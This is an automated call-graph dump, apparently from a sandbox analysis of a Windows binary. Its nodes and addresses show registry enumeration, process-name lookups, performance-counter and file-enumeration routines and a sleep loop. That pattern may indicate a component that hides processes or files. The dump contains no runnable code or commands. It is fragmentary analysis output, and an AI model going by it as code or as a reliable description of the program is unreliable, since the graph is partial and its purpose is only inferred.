RtlVirtualUnwind 7653->7654 7655 17d2dd58873 7653->7655 7654->7653 7654->7655 7656 17d2dd58814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7655->7656 7657 17d2dd533a8 7658 17d2dd533cf 7657->7658 7659 17d2dd5349c 7658->7659 7660 17d2dd533ec PdhGetCounterInfoW 7658->7660 7660->7659 7661 17d2dd5340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 7660->7661 7662 17d2dd53440 StrCmpW 7661->7662 7663 17d2dd53488 GetProcessHeap HeapFree 7661->7663 7662->7663 7665 17d2dd53455 7662->7665 7663->7659 7665->7663 7666 17d2dd53950 StrCmpNW 7665->7666 7667 17d2dd53982 StrStrW 7666->7667 7668 17d2dd539f2 7666->7668 7667->7668 7669 17d2dd5399b StrToIntW 7667->7669 7668->7665 7669->7668 7670 17d2dd539c3 7669->7670 7670->7668 7676 17d2dd51a30 OpenProcess 7670->7676 7675 17d2dd51cfc 2 API calls 7675->7668 7677 17d2dd51a64 K32GetModuleFileNameExW 7676->7677 7678 17d2dd51ab6 7676->7678 7679 17d2dd51a7e PathFindFileNameW lstrlenW 7677->7679 7680 17d2dd51aad CloseHandle 7677->7680 7678->7668 7682 17d2dd53f88 7678->7682 7679->7680 7681 17d2dd51a9c StrCpyW 7679->7681 7680->7678 7681->7680 7683 17d2dd539e4 7682->7683 7684 17d2dd53f95 StrCmpNIW 7682->7684 7683->7668 7683->7675 7684->7683 8895 17d2dd5c828 8896 17d2dd5c82d 8895->8896 8900 17d2dd5c842 8895->8900 8901 17d2dd5c848 8896->8901 8902 17d2dd5c88a 8901->8902 8905 17d2dd5c892 8901->8905 8903 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8902->8903 8903->8905 8904 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8906 17d2dd5c89f 8904->8906 8905->8904 8907 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8906->8907 8908 17d2dd5c8ac 8907->8908 8909 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8908->8909 8910 17d2dd5c8b9 8909->8910 8911 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8910->8911 8912 17d2dd5c8c6 8911->8912 8913 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8912->8913 8914 17d2dd5c8d3 8913->8914 8915 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8914->8915 8916 17d2dd5c8e0 8915->8916 8917 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8916->8917 8918 17d2dd5c8ed 8917->8918 8919 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8918->8919 8920 17d2dd5c8fd 8919->8920 8921 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8920->8921 8922 17d2dd5c90d 8921->8922 8927 17d2dd5c6f8 8922->8927 8941 17d2dd5c558 EnterCriticalSection 8927->8941 8756 17d2dd5b0d4 8762 17d2dd5b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8756->8762 8757 17d2dd5b0fb 8758 17d2dd59324 _CreateFrameInfo 9 API calls 8757->8758 8759 17d2dd5b100 8758->8759 8760 17d2dd59324 _CreateFrameInfo 9 API calls 8759->8760 8761 17d2dd5b10b __FrameHandler3::GetHandlerSearchState 8759->8761 8760->8761 8762->8757 8762->8761 8763 17d2dd599cc 9 API calls Is_bad_exception_allowed 8762->8763 8764 17d2dd599f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8762->8764 8763->8762 8764->8762 8943 17d2dd52e54 8945 17d2dd52ea8 8943->8945 8944 17d2dd52ec3 8945->8944 8947 17d2dd537f4 8945->8947 8948 17d2dd5388a 8947->8948 8949 17d2dd53819 8947->8949 8948->8944 8949->8948 8950 17d2dd53f88 StrCmpNIW 8949->8950 8951 17d2dd51e08 StrCmpIW StrCmpW 8949->8951 8950->8949 8951->8949 8405 17d2dd6494f 8406 17d2dd6495e 8405->8406 8407 17d2dd64968 8405->8407 8409 17d2dd5c5ac LeaveCriticalSection 8406->8409 7685 17d2dd619d0 7688 17d2dd5e864 7685->7688 7689 17d2dd5e871 7688->7689 7693 17d2dd5e8b6 7688->7693 7694 17d2dd5cacc 7689->7694 7691 17d2dd5e8a0 7699 17d2dd5e53c 7691->7699 7695 17d2dd5cae8 FlsGetValue 7694->7695 7697 17d2dd5cae4 7694->7697 7695->7697 7696 17d2dd5cafe 7696->7691 7697->7696 7722 17d2dd5c940 GetLastError 7697->7722 7793 17d2dd5e7ac 7699->7793 7706 17d2dd5e5a7 7707 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7706->7707 7718 17d2dd5e58e 7707->7718 7708 17d2dd5e5b6 7708->7708 7819 17d2dd5e8e0 7708->7819 7711 17d2dd5e6b2 7712 17d2dd5d1f4 __std_exception_copy 13 API calls 7711->7712 7713 17d2dd5e6b7 7712->7713 7715 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7713->7715 7714 17d2dd5e70d 7721 17d2dd5e774 7714->7721 7830 17d2dd5e05c 7714->7830 7715->7718 7716 17d2dd5e6cc 7716->7714 7719 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7716->7719 7717 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7717->7718 7718->7693 7719->7714 7721->7717 7723 17d2dd5c966 7722->7723 7724 17d2dd5c96c SetLastError 7723->7724 7740 17d2dd5d220 7723->7740 7725 17d2dd5c9e5 7724->7725 7725->7696 7728 17d2dd5c9a5 FlsSetValue 7731 17d2dd5c9b1 FlsSetValue 7728->7731 7732 17d2dd5c9c8 7728->7732 7729 17d2dd5c995 FlsSetValue 7747 17d2dd5d2a0 7729->7747 7734 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7731->7734 7753 17d2dd5c758 7732->7753 7736 17d2dd5c9c6 SetLastError 7734->7736 7736->7725 7745 17d2dd5d231 __std_exception_copy 7740->7745 7741 17d2dd5d282 7761 17d2dd5d1f4 7741->7761 7742 17d2dd5d266 HeapAlloc 7743 17d2dd5c987 7742->7743 7742->7745 7743->7728 7743->7729 7745->7741 7745->7742 7758 17d2dd5b470 7745->7758 7748 17d2dd5d2a5 HeapFree 7747->7748 7750 17d2dd5c9a3 7747->7750 7749 17d2dd5d2c0 GetLastError 7748->7749 7748->7750 7751 17d2dd5d2cd Concurrency::details::SchedulerProxy::DeleteThis 7749->7751 7750->7724 7752 17d2dd5d1f4 __std_exception_copy 11 API calls 7751->7752 7752->7750 7779 17d2dd5c630 7753->7779 7764 17d2dd5b4c0 7758->7764 7770 17d2dd5cb10 7761->7770 7769 17d2dd5c558 EnterCriticalSection 7764->7769 7771 17d2dd5cb59 GetLastError 7770->7771 7774 17d2dd5cb2f __std_exception_copy 7770->7774 7772 17d2dd5cb6c 7771->7772 7775 17d2dd5cb8a SetLastError 7772->7775 7776 17d2dd5cb87 7772->7776 7777 17d2dd5c940 __std_exception_copy 11 API calls 7772->7777 7773 17d2dd5cb54 7773->7743 7774->7773 7778 17d2dd5c940 __std_exception_copy 11 API calls 7774->7778 7775->7773 7776->7775 7777->7776 7778->7773 7791 17d2dd5c558 EnterCriticalSection 7779->7791 7794 17d2dd5e7cf 7793->7794 7795 17d2dd5e7d9 7794->7795 7845 17d2dd5c558 EnterCriticalSection 7794->7845 7797 17d2dd5e571 7795->7797 7802 17d2dd5cacc 14 API calls 7795->7802 7805 17d2dd5e22c 7797->7805 7803 17d2dd5e8a0 7802->7803 7804 17d2dd5e53c 56 API calls 7803->7804 7804->7797 7846 17d2dd5dd78 7805->7846 7808 17d2dd5e25e 7810 17d2dd5e273 7808->7810 7811 17d2dd5e263 GetACP 7808->7811 7809 17d2dd5e24c GetOEMCP 7809->7810 7810->7718 7812 17d2dd5c5d0 7810->7812 7811->7810 7813 17d2dd5c61b 7812->7813 7817 17d2dd5c5df __std_exception_copy 7812->7817 7815 17d2dd5d1f4 __std_exception_copy 13 API calls 7813->7815 7814 17d2dd5c602 HeapAlloc 7816 17d2dd5c619 7814->7816 7814->7817 7815->7816 7816->7706 7816->7708 7817->7813 7817->7814 7818 17d2dd5b470 __std_exception_copy 2 API calls 7817->7818 7818->7817 7820 17d2dd5e22c 16 API calls 7819->7820 7821 17d2dd5e91b 7820->7821 7823 17d2dd5e958 IsValidCodePage 7821->7823 7828 17d2dd5ea71 7821->7828 7829 17d2dd5e972 7821->7829 7822 17d2dd58070 _invalid_parameter_noinfo 8 API calls 7824 17d2dd5e6a9 7822->7824 7825 17d2dd5e969 7823->7825 7823->7828 7824->7711 7824->7716 7826 17d2dd5e998 GetCPInfo 7825->7826 7825->7829 7826->7828 7826->7829 7828->7822 7883 17d2dd5e344 7829->7883 7981 17d2dd5c558 EnterCriticalSection 7830->7981 7847 17d2dd5dd9c 7846->7847 7848 17d2dd5dd97 7846->7848 7847->7848 7854 17d2dd5cab0 7847->7854 7848->7808 7848->7809 7850 17d2dd5ddb7 7862 17d2dd5ffb4 7850->7862 7855 17d2dd5cb10 __std_exception_copy 13 API calls 7854->7855 7857 17d2dd5cab9 7855->7857 7856 17d2dd5cabe 7856->7850 7857->7856 7858 17d2dd5cae8 FlsGetValue 7857->7858 7860 17d2dd5cae4 7857->7860 7858->7860 7859 17d2dd5cafe 7859->7850 7860->7859 7861 17d2dd5c940 __std_exception_copy 13 API calls 7860->7861 7861->7859 7863 17d2dd5ddda 7862->7863 7864 17d2dd5ffc9 7862->7864 7866 17d2dd60020 7863->7866 7864->7863 7870 17d2dd60a40 7864->7870 7867 17d2dd60048 7866->7867 7868 17d2dd60035 7866->7868 7867->7848 7868->7867 7880 17d2dd5e8c4 7868->7880 7871 17d2dd5cab0 _invalid_parameter_noinfo 14 API calls 7870->7871 7872 17d2dd60a4f 7871->7872 7878 17d2dd60a95 7872->7878 7879 17d2dd5c558 EnterCriticalSection 7872->7879 7878->7863 7881 17d2dd5cab0 _invalid_parameter_noinfo 14 API calls 7880->7881 7882 17d2dd5e8cd 7881->7882 7884 17d2dd5e38f GetCPInfo 7883->7884 7893 17d2dd5e485 7883->7893 7890 17d2dd5e3a2 7884->7890 7884->7893 7885 17d2dd58070 _invalid_parameter_noinfo 8 API calls 7887 17d2dd5e524 7885->7887 7887->7828 7894 17d2dd61474 7890->7894 7893->7885 7895 17d2dd5dd78 14 API calls 7894->7895 7896 17d2dd614b6 7895->7896 7914 17d2dd5ec58 7896->7914 7916 17d2dd5ec61 MultiByteToWideChar 7914->7916 8768 17d2dd5f6dc 8769 17d2dd5f6e8 8768->8769 8771 17d2dd5f70f 8769->8771 8772 17d2dd61c0c 8769->8772 8773 17d2dd61c11 8772->8773 8774 17d2dd61c4c 8772->8774 8775 17d2dd61c44 8773->8775 8776 17d2dd61c32 DeleteCriticalSection 8773->8776 8774->8769 8777 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8775->8777 8776->8775 8776->8776 8777->8774 7982 17d2dd525dc 7983 17d2dd5265a 7982->7983 7984 17d2dd526bf GetFileType 7983->7984 7991 17d2dd52777 7983->7991 7985 17d2dd526e1 7984->7985 7986 17d2dd526cd StrCpyW 7984->7986 7993 17d2dd51ad4 GetFinalPathNameByHandleW 7985->7993 7989 17d2dd526ee 7986->7989 7988 17d2dd53f88 StrCmpNIW 7988->7989 7989->7988 7989->7991 7998 17d2dd53708 StrCmpIW 7989->7998 8002 17d2dd51dd4 7989->8002 7994 17d2dd51afe StrCmpNIW 7993->7994 7995 17d2dd51b3d 7993->7995 7994->7995 7996 17d2dd51b18 lstrlenW 7994->7996 7995->7989 7996->7995 7997 17d2dd51b2a StrCpyW 7996->7997 7997->7995 7999 17d2dd53751 PathCombineW 7998->7999 8000 17d2dd5373a StrCpyW StrCatW 7998->8000 8001 17d2dd5375a 7999->8001 8000->8001 8001->7989 8003 17d2dd51df4 8002->8003 8004 17d2dd51deb 8002->8004 8003->7989 8005 17d2dd51530 2 API calls 8004->8005 8005->8003 8952 17d2dd5d658 8953 17d2dd5d67d 8952->8953 8957 17d2dd5d694 8952->8957 8954 17d2dd5d1f4 __std_exception_copy 13 API calls 8953->8954 8956 17d2dd5d682 8954->8956 8955 17d2dd5d724 8960 17d2dd5bb54 13 API calls 8955->8960 8958 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 8956->8958 8957->8955 8967 17d2dd5d7b6 8957->8967 8969 17d2dd5d6da 8957->8969 8985 17d2dd5d894 8957->8985 9047 17d2dd5da18 8957->9047 8959 17d2dd5d68d 8958->8959 8961 17d2dd5d77c 8960->8961 8963 17d2dd5d784 8961->8963 8973 17d2dd5d7d7 8961->8973 8966 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8963->8966 8965 17d2dd5d836 8968 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8965->8968 8970 17d2dd5d78b 8966->8970 8972 17d2dd5d6fd 8967->8972 8976 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8967->8976 8971 17d2dd5d841 8968->8971 8969->8972 8977 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8969->8977 8970->8972 8978 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8970->8978 8975 17d2dd5d85a 8971->8975 8979 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8971->8979 8974 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8972->8974 8973->8965 8973->8973 8982 17d2dd5d87c 8973->8982 9084 17d2dd60eb8 8973->9084 8974->8959 8980 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8975->8980 8976->8967 8977->8969 8978->8970 8979->8971 8980->8959 8983 17d2dd5d06c _invalid_parameter_noinfo 17 API calls 8982->8983 8984 17d2dd5d891 8983->8984 8986 17d2dd5d8c2 8985->8986 8986->8986 8987 17d2dd5d8de 8986->8987 8988 17d2dd5d220 __std_exception_copy 13 API calls 8986->8988 8987->8957 8989 17d2dd5d90d 8988->8989 8990 17d2dd5d926 8989->8990 8992 17d2dd60eb8 38 API calls 8989->8992 8991 17d2dd60eb8 38 API calls 8990->8991 9002 17d2dd5d9fc 8990->9002 8993 17d2dd5d943 8991->8993 8992->8990 8995 17d2dd5d962 8993->8995 8996 17d2dd5d98d 8993->8996 8993->9002 9014 17d2dd5d97f 8993->9014 8994 17d2dd5d06c _invalid_parameter_noinfo 17 API calls 8999 17d2dd5da17 8994->8999 8997 17d2dd5d220 __std_exception_copy 13 API calls 8995->8997 9009 17d2dd5d977 8996->9009 9093 17d2dd5eee0 8996->9093 9001 17d2dd5d96d 8997->9001 8998 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8998->9002 9004 17d2dd5da7a 8999->9004 9102 17d2dd613d8 8999->9102 9000 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9000->9014 9005 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9001->9005 9002->8994 9008 17d2dd5da8c 9004->9008 9017 17d2dd5daa1 9004->9017 9005->9009 9006 17d2dd5d9b5 9010 17d2dd5d9d0 9006->9010 9011 17d2dd5d9ba 9006->9011 9013 17d2dd5d894 52 API calls 9008->9013 9009->9000 9009->9014 9012 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9010->9012 9015 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9011->9015 9012->9014 9016 17d2dd5da9c 9013->9016 9014->8998 9015->9009 9018 17d2dd58070 _invalid_parameter_noinfo 8 API calls 9016->9018 9019 17d2dd5dd78 14 API calls 9017->9019 9021 17d2dd5dd64 9018->9021 9020 17d2dd5db0b 9019->9020 9022 17d2dd5db1a 9020->9022 9023 17d2dd5f198 9 API calls 9020->9023 9021->8957 9111 17d2dd5d30c 9022->9111 9023->9022 9026 17d2dd5dba8 9027 17d2dd5d894 52 API calls 9026->9027 9028 17d2dd5dbb8 9027->9028 9028->9016 9030 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9028->9030 9029 17d2dd5dd78 14 API calls 9034 17d2dd5dbd2 9029->9034 9030->9016 9031 17d2dd5f198 9 API calls 9031->9034 9033 17d2dd5d894 52 API calls 9033->9034 9034->9029 9034->9031 9034->9033 9035 17d2dd5dcc8 FindNextFileW 9034->9035 9036 17d2dd5dd2a 9034->9036 9042 17d2dd5d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 9034->9042 9133 17d2dd5d4ac 9034->9133 9035->9034 9037 17d2dd5dce0 9035->9037 9038 17d2dd5dd38 FindClose 9036->9038 9040 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9036->9040 9039 17d2dd5dd0c FindClose 9037->9039 9155 17d2dd60b20 9037->9155 9038->9016 9041 17d2dd5dd48 9038->9041 9039->9016 9044 17d2dd5dd1c 9039->9044 9040->9038 9045 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9041->9045 9042->9034 9046 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9044->9046 9045->9016 9046->9016 9048 17d2dd5da7a 9047->9048 9049 17d2dd5da58 9047->9049 9051 17d2dd5da8c 9048->9051 9053 17d2dd5daa1 9048->9053 9049->9048 9050 17d2dd613d8 38 API calls 9049->9050 9050->9049 9052 17d2dd5d894 56 API calls 9051->9052 9077 17d2dd5da9c 9052->9077 9055 17d2dd5dd78 14 API calls 9053->9055 9054 17d2dd58070 _invalid_parameter_noinfo 8 API calls 9057 17d2dd5dd64 9054->9057 9056 17d2dd5db0b 9055->9056 9058 17d2dd5db1a 9056->9058 9059 17d2dd5f198 9 API calls 9056->9059 9057->8957 9060 17d2dd5d30c 16 API calls 9058->9060 9059->9058 9061 17d2dd5db7b FindFirstFileExW 9060->9061 9062 17d2dd5dbd2 9061->9062 9063 17d2dd5dba8 9061->9063 9066 17d2dd5dd78 14 API calls 9062->9066 9068 17d2dd5f198 9 API calls 9062->9068 9069 17d2dd5d4ac 16 API calls 9062->9069 9070 17d2dd5d894 56 API calls 9062->9070 9071 17d2dd5dcc8 FindNextFileW 9062->9071 9072 17d2dd5dd2a 9062->9072 9079 17d2dd5d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 9062->9079 9064 17d2dd5d894 56 API calls 9063->9064 9065 17d2dd5dbb8 9064->9065 9067 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9065->9067 9065->9077 9066->9062 9067->9077 9068->9062 9069->9062 9070->9062 9071->9062 9073 17d2dd5dce0 9071->9073 9074 17d2dd5dd38 FindClose 9072->9074 9076 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9072->9076 9075 17d2dd5dd0c FindClose 9073->9075 9080 17d2dd60b20 38 API calls 9073->9080 9074->9077 9078 17d2dd5dd48 9074->9078 9075->9077 9081 17d2dd5dd1c 9075->9081 9076->9074 9077->9054 9082 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9078->9082 9079->9062 9080->9075 9083 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9081->9083 9082->9077 9083->9077 9088 17d2dd60ed5 9084->9088 9085 17d2dd60eda 9086 17d2dd60ef0 9085->9086 9087 17d2dd5d1f4 __std_exception_copy 13 API calls 9085->9087 9086->8973 9089 17d2dd60ee4 9087->9089 9088->9085 9088->9086 9091 17d2dd60f24 9088->9091 9090 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 9089->9090 9090->9086 9091->9086 9092 17d2dd5d1f4 __std_exception_copy 13 API calls 9091->9092 9092->9089 9094 17d2dd5ef02 9093->9094 9095 17d2dd5ef1f 9093->9095 9094->9095 9096 17d2dd5ef10 9094->9096 9099 17d2dd5ef29 9095->9099 9163 17d2dd619f0 9095->9163 9098 17d2dd5d1f4 __std_exception_copy 13 API calls 9096->9098 9101 17d2dd5ef15 9098->9101 9170 17d2dd61a40 9099->9170 9101->9006 9103 17d2dd613e0 9102->9103 9104 17d2dd613f5 9103->9104 9106 17d2dd6140e 9103->9106 9105 17d2dd5d1f4 __std_exception_copy 13 API calls 9104->9105 9107 17d2dd613fa 9105->9107 9108 17d2dd5dd78 14 API calls 9106->9108 9110 17d2dd61405 9106->9110 9109 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 9107->9109 9108->9110 9109->9110 9110->8999 9112 17d2dd5d35a 9111->9112 9113 17d2dd5d336 9111->9113 9114 17d2dd5d3bf 9112->9114 9115 17d2dd5d35f 9112->9115 9116 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9113->9116 9123 17d2dd5d345 FindFirstFileExW 9113->9123 9117 17d2dd5ec58 MultiByteToWideChar 9114->9117 9118 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9115->9118 9122 17d2dd5d374 9115->9122 9115->9123 9116->9123 9125 17d2dd5d3db 9117->9125 9118->9122 9119 17d2dd5c5d0 14 API calls 9119->9123 9120 17d2dd5d3e2 GetLastError 9124 17d2dd5d184 13 API calls 9120->9124 9121 17d2dd5d420 9121->9123 9127 17d2dd5ec58 MultiByteToWideChar 9121->9127 9122->9119 9123->9026 9123->9034 9128 17d2dd5d3ef 9124->9128 9125->9120 9125->9121 9126 17d2dd5d413 9125->9126 9129 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9125->9129 9130 17d2dd5c5d0 14 API calls 9126->9130 9131 17d2dd5d47a 9127->9131 9132 17d2dd5d1f4 __std_exception_copy 13 API calls 9128->9132 9129->9126 9130->9121 9131->9120 9131->9123 9132->9123 9134 17d2dd5d4fa 9133->9134 9135 17d2dd5d4d6 9133->9135 9137 17d2dd5d55f 9134->9137 9138 17d2dd5d500 9134->9138 9136 17d2dd5d4e5 9135->9136 9139 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9135->9139 9136->9034 9140 17d2dd5ece8 WideCharToMultiByte 9137->9140 9138->9136 9141 17d2dd5d515 9138->9141 9143 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9138->9143 9139->9136 9148 17d2dd5d583 9140->9148 9144 17d2dd5c5d0 14 API calls 9141->9144 9142 17d2dd5d58a GetLastError 9145 17d2dd5d184 13 API calls 9142->9145 9143->9141 9144->9136 9147 17d2dd5d597 9145->9147 9146 17d2dd5ece8 WideCharToMultiByte 9149 17d2dd5d629 9146->9149 9150 17d2dd5d1f4 __std_exception_copy 13 API calls 9147->9150 9148->9142 9151 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9148->9151 9153 17d2dd5d5c7 9148->9153 9154 17d2dd5d5bb 9148->9154 9149->9136 9149->9142 9150->9136 9151->9154 9152 17d2dd5c5d0 14 API calls 9152->9153 9153->9136 9153->9146 9154->9152 9156 17d2dd60b52 9155->9156 9157 17d2dd5d1f4 __std_exception_copy 13 API calls 9156->9157 9162 17d2dd60b67 9156->9162 9158 17d2dd60b5c 9157->9158 9159 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 9158->9159 9159->9162 9160 17d2dd58070 _invalid_parameter_noinfo 8 API calls 9161 17d2dd60ea8 9160->9161 9161->9039 9162->9160 9164 17d2dd61a12 HeapSize 9163->9164 9165 17d2dd619f9 9163->9165 9166 17d2dd5d1f4 __std_exception_copy 13 API calls 9165->9166 9167 17d2dd619fe 9166->9167 9168 17d2dd5d04c _invalid_parameter_noinfo 38 API calls 9167->9168 9169 17d2dd61a09 9168->9169 9169->9099 9171 17d2dd61a5f 9170->9171 9172 17d2dd61a55 9170->9172 9173 17d2dd61a64 9171->9173 9180 17d2dd61a6b __std_exception_copy 9171->9180 9174 17d2dd5c5d0 14 API calls 9172->9174 9175 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9173->9175 9178 17d2dd61a5d 9174->9178 9175->9178 9176 17d2dd61a71 9179 17d2dd5d1f4 __std_exception_copy 13 API calls 9176->9179 9177 17d2dd61a9e HeapReAlloc 9177->9178 9177->9180 9178->9101 9179->9178 9180->9176 9180->9177 9181 17d2dd5b470 __std_exception_copy 2 API calls 9180->9181 9181->9180 8006 17d2dd5c1d8 8007 17d2dd5c1f1 8006->8007 8008 17d2dd5c209 8006->8008 8007->8008 8009 17d2dd5d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8007->8009 8009->8008 8778 17d2dd52ed8 8780 17d2dd52f35 8778->8780 8779 17d2dd52f50 8780->8779 8781 17d2dd538a8 3 API calls 8780->8781 8781->8779 9182 17d2dd5ae42 9183 17d2dd59324 _CreateFrameInfo 9 API calls 9182->9183 9185 17d2dd5ae4f __CxxCallCatchBlock 9183->9185 9184 17d2dd5ae93 RaiseException 9186 17d2dd5aeba 9184->9186 9185->9184 9187 17d2dd59978 __CxxCallCatchBlock 9 API calls 9186->9187 9191 17d2dd5aec2 9187->9191 9188 17d2dd59324 _CreateFrameInfo 9 API calls 9189 17d2dd5aefe 9188->9189 9190 17d2dd59324 _CreateFrameInfo 9 API calls 9189->9190 9192 17d2dd5af07 9190->9192 9193 17d2dd58ff8 __CxxCallCatchBlock 9 API calls 9191->9193 9194 17d2dd5aeeb __CxxCallCatchBlock 9191->9194 9193->9194 9194->9188 7466 17d2dd51bc4 7473 17d2dd51724 GetProcessHeap HeapAlloc 7466->7473 7468 17d2dd51bd3 7469 17d2dd51bda SleepEx 7468->7469 7472 17d2dd5159c StrCmpIW StrCmpW 7468->7472 7524 17d2dd519b0 7468->7524 7470 17d2dd51724 50 API calls 7469->7470 7470->7468 7472->7468 7541 17d2dd51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7541 7475 17d2dd5174c 7542 17d2dd51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7542 7477 17d2dd51754 7543 17d2dd51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7477->7543 7479 17d2dd5175d 7544 17d2dd51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7479->7544 7481 17d2dd51766 7545 17d2dd51264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7481->7545 7483 17d2dd5176f 7546 17d2dd51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7483->7546 7485 17d2dd51778 7547 17d2dd51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7485->7547 7487 17d2dd51781 7548 17d2dd51000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7487->7548 7489 17d2dd5178a RegOpenKeyExW 7490 17d2dd519a2 7489->7490 7491 17d2dd517bc RegOpenKeyExW 7489->7491 7490->7468 7492 17d2dd517fb RegOpenKeyExW 7491->7492 7493 17d2dd517e5 7491->7493 7494 17d2dd5181f 7492->7494 7495 17d2dd51836 RegOpenKeyExW 7492->7495 7549 17d2dd512b8 RegQueryInfoKeyW 7493->7549 7558 17d2dd5104c RegQueryInfoKeyW 7494->7558 7498 17d2dd51871 RegOpenKeyExW 7495->7498 7499 17d2dd5185a 7495->7499 7503 17d2dd518ac RegOpenKeyExW 7498->7503 7504 17d2dd51895 7498->7504 7502 17d2dd512b8 16 API calls 7499->7502 7505 17d2dd51867 RegCloseKey 7502->7505 7507 17d2dd518d0 7503->7507 7508 17d2dd518e7 RegOpenKeyExW 7503->7508 7506 17d2dd512b8 16 API calls 7504->7506 7505->7498 7511 17d2dd518a2 RegCloseKey 7506->7511 7512 17d2dd512b8 16 API calls 7507->7512 7509 17d2dd51922 RegOpenKeyExW 7508->7509 7510 17d2dd5190b 7508->7510 7514 17d2dd5195d RegOpenKeyExW 7509->7514 7515 17d2dd51946 7509->7515 7513 17d2dd5104c 6 API calls 7510->7513 7511->7503 7516 17d2dd518dd RegCloseKey 7512->7516 7517 17d2dd51918 RegCloseKey 7513->7517 7519 17d2dd51981 7514->7519 7520 17d2dd51998 RegCloseKey 7514->7520 7518 17d2dd5104c 6 API calls 7515->7518 7516->7508 7517->7509 7521 17d2dd51953 RegCloseKey 7518->7521 7522 17d2dd5104c 6 API calls 7519->7522 7520->7490 7521->7514 7523 17d2dd5198e RegCloseKey 7522->7523 7523->7520 7568 17d2dd514a0 7524->7568 7541->7475 7542->7477 7543->7479 7544->7481 7545->7483 7546->7485 7547->7487 7548->7489 7550 17d2dd51323 GetProcessHeap HeapAlloc 7549->7550 7551 17d2dd51486 RegCloseKey 7549->7551 7552 17d2dd51472 GetProcessHeap HeapFree 7550->7552 7553 17d2dd5134e RegEnumValueW 7550->7553 7551->7492 7552->7551 7554 17d2dd513a1 7553->7554 7554->7552 7554->7553 7556 17d2dd513cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7554->7556 7557 17d2dd5141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7554->7557 7563 17d2dd51530 7554->7563 7556->7557 7557->7554 7559 17d2dd511b5 RegCloseKey 7558->7559 7561 17d2dd510bf 7558->7561 7559->7495 7560 17d2dd510cf RegEnumValueW 7560->7561 7561->7559 7561->7560 7562 17d2dd5114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7561->7562 7562->7561 7566 17d2dd51580 